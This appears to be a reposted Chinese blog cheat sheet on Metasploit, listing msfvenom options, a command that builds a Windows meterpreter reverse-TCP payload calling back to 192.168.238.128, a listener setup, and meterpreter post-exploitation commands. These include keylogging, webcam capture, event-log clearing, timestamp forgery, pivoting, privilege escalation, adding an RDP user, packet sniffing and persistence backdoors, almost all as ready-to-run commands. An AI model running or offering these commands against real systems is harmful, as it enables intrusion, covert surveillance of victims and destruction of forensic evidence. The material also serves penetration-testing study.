MSF笔记

一、msfvenom使用

======================msfvenom菜单选项===========================
1 Options:
2 -p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定
3 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
4 -n, --nopsled <length> 为payload预先指定一个NOP滑动长度
5 -f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
6 -e, --encoder [encoder] 指定需要使用的encoder(编码器)
7 -a, --arch <architecture> 指定payload的目标架构
8 --platform <platform> 指定payload的目标平台
9 -s, --space <length> 设定有效攻击荷载的最大长度
10 -b, --bad-chars <list> 设定规避字符集,比如: &#039;\x00\xff&#039;
11 -i, --iterations <count> 指定payload的编码次数
12 -c, --add-code <path> 指定一个附加的win32 shellcode文件
13 -x, --template <path> 指定一个自定义的可执行文件作为模板
14 -k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
15 --payload-options 列举payload的标准选项
16 -o, --out <path> 保存payload
17 -v, --var-name <name> 指定一个自定义的变量,以确定输出格式
18 --shellest 最小化生成payload
19 -h, --help 查看帮助选项
20 --help-formats 查看msf支持的输出格式列表
==========举例子:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.238.128 lport=12345 -f py >shellcode.py

二、免杀处理

三、msfconsole使用

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.238.128
set lport 12345
exploit -j -z
=====================meterpreter操作======================
0x01常用的系统命令:
sessions 	#sessions –h 查看帮助
sessions -i <ID值> 		#进入会话 -k 杀死会话
background /bg 		#将当前会话放置后台
run / exploit -j -z		#执行已有的模块,输入run后按两下tab,列出已有的脚本
info 		#查看已有模块信息
getuid 		# 查看权限
getpid 		# 获取当前进程的pid
getprivs	#查看当前的权限
sysinfo 		# 查看目标机系统信息
ps 				# 查看当前活跃进程
kill <PID值> 	#杀死进程
idletime 		#查看目标机闲置时间
reboot / shutdown 		#重启/关机
shell 					#进入目标机cmd shell
=====================meterpreter操作======================
0x02进程迁移命令:
getpid 		# 获取当前进程的pid
ps 			# 查看当前活跃进程
migrate <pid值> 		#将Meterpreter会话移植到指定pid值进程中
kill <pid值> 			#杀死进程
=====================meterpreter操作======================
0x03执行文件命令:
execute 		#在目标机中执行文件
execute -H -i -f cmd.exe 	# 创建新进程cmd.exe,-H不可见,-i交互
=====================meterpreter操作======================
0x04摄像头、键盘记录、UI开关、日志命令:
webcam_list 		#查看摄像头
webcam_snap 		#通过摄像头拍照
webcam_stream 		#通过摄像头开启视频
uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
uictl disable mouse 		#禁用鼠标
uictl disable keyboard 		#禁用键盘
keyscan_start				#开始记录键盘输入
keyscan_dump				#导出键盘记录
keyscan_stop				#停止键盘记录
clearev 					#清除windows中的应用程序日志、系统日志、安全日志
screenshot 					#截屏操作
run vnc						#远程桌面
=====================meterpreter操作======================
0x05基本文件系统命令:
getwd 或者pwd 	# 查看当前工作目录
ls
cd search -f *pass*	 	# 搜索文件 -h查看帮助
cat c:\\lltest\\lltestpasswd.txt 	# 查看文件内容
upload /tmp/hack.txt C:\\lltest		 # 上传文件到目标机上
download c:\\lltest\\lltestpasswd.txt /tmp/		 # 下载文件到本机上
edit c:\\1.txt 			#编辑或创建文件 没有的话,会新建文件
rm C:\\lltest\\hack.txt 
mkdir lltest2 		#只能在当前目录下创建文件夹
rmdir lltest2 		#只能删除当前目录下文件夹
getlwd 或者 lpwd 		#操作攻击者主机 查看当前目录
lcd /tmp 			#操作攻击者主机 切换目录
=====================meterpreter操作======================
0x06文件时间戳伪造命令:
timestomp C:// -h 			#查看帮助
timestomp -v C://2.txt 		#查看时间戳
timestomp C://2.txt -f C://1.txt 			#将1.txt的时间戳复制给2.txt
=====================meterpreter操作======================
0x07端口转发命令:
portfwd add -l 6666 -p 3389 -r 127.0.0.1 		#将目标机的3389端口转发到本地6666端口

=====================meterpreter操作======================
0x08autoroute添加路由:
run autoroute –h 		#查看帮助
run autoroute -s 192.168.159.0/24 		#添加到目标环境网络
run autoroute –p 		#查看添加的路由
=====================meterpreter操作======================
0x09信息收集脚本命令:
run post/windows/gather/checkvm 	#是否虚拟机
run post/linux/gather/checkvm 		#是否虚拟机
run post/windows/gather/forensics/enum_drives 	#查看分区
run post/windows/gather/enum_applications	 #获取安装软件信息
run post/windows/gather/dumplinks 	#获取最近的文件操作
run post/windows/gather/enum_ie 	#获取IE缓存
run post/windows/gather/enum_chrome 	#获取Chrome缓存
run post/windows/gather/enum_patches 	#补丁信息
run post/windows/gather/enum_domain 	#查找域控
=====================meterpreter操作======================
0x10MSF新增Socks代理节点命令:
use auxiliary/server/socks_proxy
set SRVHOST 192.168.238.128
set SRVPORT 6677
set username username
set password password
run

然后vi /etc/proxychains.conf #添加 socks5 192.168.238.128 6677 username password
最后proxychains 使用Socks代理访问

补充:可以使用其他的socks代理服务器进行代理
只需vi /etc/proxychains4.conf
添加:socks5 服务器ip地址 端口号 账号 密码
proxychains4 firefox即可使用代理访问
=====================meterpreter操作======================
0x11开启远程RDP命令:
run post/windows/manage/enable_rdp #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将3389端口转发到6662
=====================meterpreter操作======================
0x12提权命令:
use exploit/windows/local/ask
set session 1
set payload windows/meterpreter/reverse_tcp
run
getsystem获取system权限
=====================meterpreter操作======================
0x13端口扫描命令:
run post/windows/gather/arp_scanner rhosts=192.168.238.0/24
run auxiliary/scanner/portscan/tcp rhosts=192.168.3.13 ports=3389
=====================meterpreter操作======================
0x14sniffer抓包命令:
use sniffer
sniffer_interfaces 		#查看网卡
sniffer_start 2 		#选择网卡 开始抓包
sniffer_stats 2 		#查看状态
sniffer_dump 2 /tmp/lltest.pcap 		#导出pcap数据包
sniffer_stop 2 		#停止抓包
=====================meterpreter操作======================
0x15persistence启动项后门/metsvc服务命令:

use exploit/windows/local/persistence
set session 1
run

use exploit/windows/local/persistence_service
set session 1
run 


在meterpreter里执行:
run metsvc

猜你喜欢

转载自blog.csdn.net/dakhda/article/details/132513333
msf
今日推荐